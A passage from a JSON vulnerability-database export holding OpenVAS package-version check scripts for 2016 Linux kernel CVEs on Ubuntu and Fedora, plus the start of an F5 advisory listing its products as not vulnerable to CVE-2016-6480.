remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842911", "type": "openvas", "title": "Ubuntu Update for linux USN-3098-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3098-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842911\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:34 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3098-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3098-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3098-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic-lpae\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-lowlatency\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-e500\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-e500mc\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc-smp\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc64-emb\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-powerpc64-smp\", ver:\"3.13.0-98.145\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-09-07T00:00:00", "id": "OPENVAS:1361412562310809206", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809206", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-f1adaaadc6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-f1adaaadc6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809206\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 10:08:40 +0530 (Wed, 07 Sep 2016)\");\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-f1adaaadc6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-f1adaaadc6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QDP4VXQTCWIXMLEFFJABIUUXANGLSC3P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.2~101.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-09-07T00:00:00", "id": "OPENVAS:1361412562310809207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809207", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-2e5ebfed6d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-2e5ebfed6d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809207\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 10:08:47 +0530 (Wed, 07 Sep 2016)\");\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-2e5ebfed6d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2e5ebfed6d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BKRCZ4MFYMHSC2OUN27IALXPL5Y3PDJH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.2~201.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842909", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842909", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3099-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3099-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842909\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:27 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3099-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1030-snapdragon\", ver:\"4.4.0-1030.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842908", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842908", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3099-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3099-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842908\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:23 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3099-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1027-raspi2\", ver:\"4.4.0-1027.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842910", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842910", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3099-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3099-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842910\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:31 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3099-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3099-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n 14.04 LTS.\n\nVladimí r Beneš discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-generic\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-generic-lpae\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-lowlatency\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc-e500mc\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc-smp\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc64-emb\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc64-smp\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:03", "bulletinFamily": "software", "cvelist": ["CVE-2016-6480"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-12-20T20:32:00", "published": "2016-12-20T20:32:00", "href": "https://support.f5.com/csp/article/K37046163", "id": 